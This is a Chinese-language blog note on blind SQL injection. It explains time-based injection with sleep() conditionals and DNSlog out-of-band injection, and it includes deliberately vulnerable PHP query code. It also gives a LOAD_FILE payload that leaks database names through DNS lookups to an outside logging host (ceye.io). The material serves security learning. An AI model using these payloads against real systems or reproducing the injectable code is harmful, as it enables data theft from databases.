SQL盲注——时间盲注,dnslog盲注

最新推荐文章于 2024-05-02 00:36:59 发布
最新推荐文章于 2024-05-02 00:36:59 发布
阅读量245 收藏
点赞数
分类专栏: 笔记 文章标签: mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mikeyning/article/details/107540272
版权

SQL盲注——时间盲注,dnslog盲注

时间盲注

时间盲注原理

$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
	if($row)
	{
  	echo 'You are in...........'}
	else 
	{
	echo 'You are in...........';
	}

代码存在SQL注入漏洞
然而页面不会回显数据,也不会回显错误信息
语句执行后不提示真假,我们不能通过页面内容进行判断
这里我们可以通过构造语句,通过页面响应的时长

核心语法:if(left(user(),1)=‘a’,0,sleep(3));
真实场景: if(ascii(substr(database(),1,1)>115,0,sleep(5))%23

DNSlog盲注

DNSlog盲注原理

$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
	if($row)
	{
  	echo 'Right'}
	else 
	{
	echo 'Wrong';
	}

代码存在SQL注入漏洞
然而页面不会回显数据,也不会回显错误信息
我们通过布尔盲注或者时间盲注都可以获取到内容,但是整个过程中效率低,需要发送很多的请求进行判断,很可能会触发安全设备的防护
我们需要一种方式,减少请求,直接回显数据,这里可以使用DNSlog实现注入

一个DNSlog平台:ceye.io
DNS在解析的时候会留下日志,通过读取多级域名的解析日志,获取请求信息
解析日志会记录HTTP Request和DNS Query
HTTP Request 包括了请求地址的详情,请求的来源地址,方式,UA等
DNS QUery 包括了请求的详情和来源地址。

MySql LOAD_FILE函数可以发起请求
SELECT LOAD_FILE(CONCAT(’\\’,‘test’,’.mysql.eftf8t.ceye.io\abc’)); -> test.mysql.eftf8t.ceye.io

核心语法
SELECT LOAD_FILE(CONCAT(’\\’,(select database()),’.mysql.eftf8t.ceye.io\abc’));
通过SQL语句查询内容,作为请求的一部分,发送至Dnslog
只要对这一部分进行构建,就能实现有回显的SQL注入
值得主意的是,这些数据格式和内容都有限制(比如不能使用特殊符号),需要进行一些处理
Load_file()只能在windows系统下发起请求
所以只有目标是windows系统时才能使用DNSlog注入,在linux下是不能的。

mikeyning
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
python编写的sql盲注
10-28
python编写的sql盲注
Dnslog盲注时间盲注)less-9-10
01mx的博客
03-26 430
Dnslog注入原理 代码虽然存在sql注入,然而页面不会回显数据,也不会回显错误信息。 通过布尔注入,和时间盲注都可以获取到内容,但是整个过程效率低,需要发很多请求判断。可能会触发安全设备。 这里我们我们需要一种方式,减少请求,直接回显数据,这里可以使用dnslog注入 dnslog平台 http://ceye.io dns在解析是会留下日志,通过读取多级域名的解析日志,获取请求信息 知识扩展 首先说明,dns带外查询属于MySQL注入,在MySQL中有个系统属性 secure_file_priv特性,有
渗透测试基础-盲注(布尔盲注时间盲注
weixin_45488495的博客
04-09 4279
渗透测试基础-盲注布尔盲注时间盲注盲注实现的关键函数布尔盲注靶场演练时间盲注靶场演练漏洞总结 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! 盲注的特点如它的名字那样,它关闭了因恶意语句而导致的报错,也没有了像显错注入那样醒目的提醒。它的提示会很隐晦,就看我们有没有能力能让它显现出来。 布尔盲注时间盲注 盲注也分布尔盲注时间盲注,这里分别来了解一下各自的区别 布尔盲注:相较于显错注入,反应会更隐晦,比如当执行的恶意语句条件为Fal
2024年网络安全最新超硬核,SQL注入之时间盲注,原理+步骤+实战思路
最新发布
2401_84252281的博客
05-02 234
如果页面响应时间超过5秒,说明长度判断正确(sleep(5));如果页面响应时间不超过5秒(正常响应),说明长度判断错误,继续递增判断长度。
SQL注入-盲注-时间注入-报错注入-布尔盲注-DNSlog注入-宽字节注入-WAF绕过-SqlMap使用
VictorZhang
07-30 6009
Sqli-labs的安装 1.安装WAMP http://www.wampserver.com/ WAMP是php + mysql + Apache环境集成工具 2.下载Sqli-labs https://github.com/webattacker/sqli-labs 将Sqli-labs解压后整个目录拖拽到路劲:C:\wamp64\www 下 3.在浏览器上访问http://localhost...
dnslogsql盲注
CvtNhso的博客
01-31 462
相当于请求了一个UNC的地址就是这样一个数据\\user().kysngm.dnslog.cn这个主机下的/abc这个共享文件夹虽然不存在但是无所谓我们的目的是需要将user()数据获取,它会将数据解析到我们使用的dnslog.cn中它可以记录解析后的数据。可以进到my.ini文件中将secure_file_priv的值从null改为""secure_file_priv为null,load_file则不能加载文件。secure_file_priv为路径,可以读取路径中的文件;
sql注入--11dnslog盲注
技术骨干小李的博客
07-27 317
攻击者--发送payload–>web服务器---->数据库(解析loadfile函数)---->根据语句包含的域名访问本地dns服务器–不能解析发送到–>公网上dns服务器解析–解析完成后–>dns本地服务器---->攻击者服务器。因为在数据库中已经把要执行的命令带入到dns解析中去了,dns服务器再发送给攻击者服务器,就可以搜到前缀,前缀就是我们想得到的信息。上面显示的域名就是帮助我们模拟了一个攻击者服务器的域名。利用dns外带的形式。...
布尔盲注.py_sql盲注python_
10-03
布尔盲注(Boolean-Based Blind Injection)是SQL注入攻击的一种类型,攻击者通过发送精心构造的查询,观察系统响应是否变化来判断数据库中的信息。在这个场景中,我们关注的是一个名为"布尔盲注.py"的Python脚本,...
sql盲注检测的简单脚本.zip
03-10
5. **检测脚本**:压缩包中的"sql注入检测"可能是用于自动化检测SQL盲注的脚本,它可能包含了一些探测技巧,如上述的异常响应和时间延迟法。使用这类脚本,开发者或安全人员可以快速扫描网站,找出可能存在的SQL注入...
SQL盲注利用工具
11-15
2. **时间盲注**:与延迟盲注类似,但不是通过延时函数,而是通过精确计算查询执行的时间差异来获取信息。例如,使用IF()或CASE WHEN...THEN...END语句,根据不同的结果路径来改变查询执行的时间。 3. **基于字符的...
sql盲注拦截器配置文件
11-20
SQL盲注SQL Blind Injection)是一种常见的网络安全威胁,它利用了Web应用程序中对用户输入处理不当的漏洞。当攻击者可以向数据库发送恶意构造的SQL查询,并根据应用程序的响应来推断数据库信息时,就可能发生SQL...
时间盲注(延迟注入)
热门推荐
qq_51954912的博客
04-25 1万+
时间盲注简介 时间盲注,个人理解,适用于页面不会返回错误信息,只会回显一种界面,其主要特征是利用sleep函数,制造时间延迟,由回显时间来判断是否报错。 官方理解:利用sleep()或benchmark()等函数让mysql执行时间变长经常与if(expr1,expr2,expr3)语句结合使用,通过页面的响应时间来判断条件是否正确。if(expr1,expr2,expr3)含义是如果expr1是True,则返回expr2,否则返回expr3。(除了看不懂,哪都好)。 利用sql-labs第九关进行实操演示
SQL注入之DnsLog注入
qq_52310755的博客
03-22 1967
远程访问UNC路径中主机的地址,如果是域名将会进行解析并留下记录,通过查看DNS解析记录(DNS日志)来达到有回显的目的。DnsLog注入就是利用load_file()函数访问远程文件的特点,对延时盲注等无回显的注入或其他无回显的攻击带来回显。正常来讲每个查询记录都会在相应DNS服务器上留下相关的查询日志,一般来说企业或者自己部署的DNS在上图标红位置处,Ps:如果paylaod没有问题但一直刷新不出来可能是谷歌浏览器的问题,换个浏览器访问一下就可以了。,下面以盲注为例,需要有盲注的基础。
SQL注入-DNSLOG打消你的盲打盲注
weixin_54217950的博客
02-18 4277
Dnslog Dnslog就是存储在DNS Server上的域名信息,它记录着用户对域名www.test.com、t00ls.com.等的访问信息。 Dnslog盲注 对于SQL盲注,我们可以通过布尔或者时间盲注获取内容,但是整个过程效率低,需要发送很多的请求进行判断,容易触发安全设备的防护,Dnslog盲注可以减少发送的请求,直接回显数据实现注入 使用DnsLog盲注仅限于windos环境。 其中,红色部分是可控的。我们只需要搭建一个红色部分的DNS服务器,并将要盲打或盲注的回显,放到自己域名的二级甚至
SQL注入学习-Dnslog盲注
笑花大王
02-17 666
1.基础知识 1.DNS DNS(Domain Name System,域名系统),因特网上作为域名和IP地址相互映射的一个分布式数据库,能够使用户更方便的访问互联网,而不用去记住能够被机器直接读取的IP数串。通过主机名,最终得到该主机名对应的IP地址的过程叫做域名解析(或主机名解析)。DNS协议运行在UDP协议之上,使用端口号53。在RFC文档中RFC 2181对DNS有规范说明,RF...
mysql dnslog_DNSlog盲注
weixin_33365844的博客
01-27 307
前言在渗透测试中,经常遇到如下情景:1,sql盲注2,blind型ssrf以及xxe3,无回显命令执行漏洞...dnslog盲注原理开放的DNSlog平台:http://ceye.io/在http://ceye.io/上我们可以获取到有关ceye.io的DNS查询信息。域名解析的过程,是由顶级域名向下逐级解析。我们构造的攻击语句也是如此,当它发现域名中存在ceye.io时,它会将这条域名信息转到相...
利用DNSlog进行sql盲注
weixin_44743506的博客
08-30 2203
一、原理 测试一些网站的时候,一些注入都是无回显的,手工盲注效率太低,我们可以写脚本来进行盲注,但有些网站会ban掉我们的ip,虽然可以通过设置ip代理池解决,但是盲注往往效率很低,所以产生了DNSlog注入。 首先有一个可以用于dns解析的域名,比如ceye.io。通过代理商设置域名ceye.io的nameserver为自己的服务器a,再在服务器a上配置好dns服务器,这样所有ceye.io...
MySQL盲注
qq_39654116的博客
01-05 342
这里写目录标题布尔盲注时间盲注sleep函数benchmark函数笛卡尔积函数get_lock盲注正则DOS RLIKE注入dnslog盲注后续待补充 布尔盲注 盲注一般先看长度 id=4 and length(user())=14 布尔盲注的方法 substr,substring,mid,left,right截取单个字符 id=4 and substr((select user()),1,1)=0x72 id=4 and left((select user()),1)=0x72 用ascii(),or
SQL盲注技术原理与应用实践
SQL盲注可以分为基于布尔的盲注、基于时间盲注以及基于报错的盲注。基于布尔的盲注是指通过布尔值来确定注入语句的执行结果,而基于时间盲注是指通过延迟的时间来确定注入语句的执行结果。基于报错的盲注是指...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值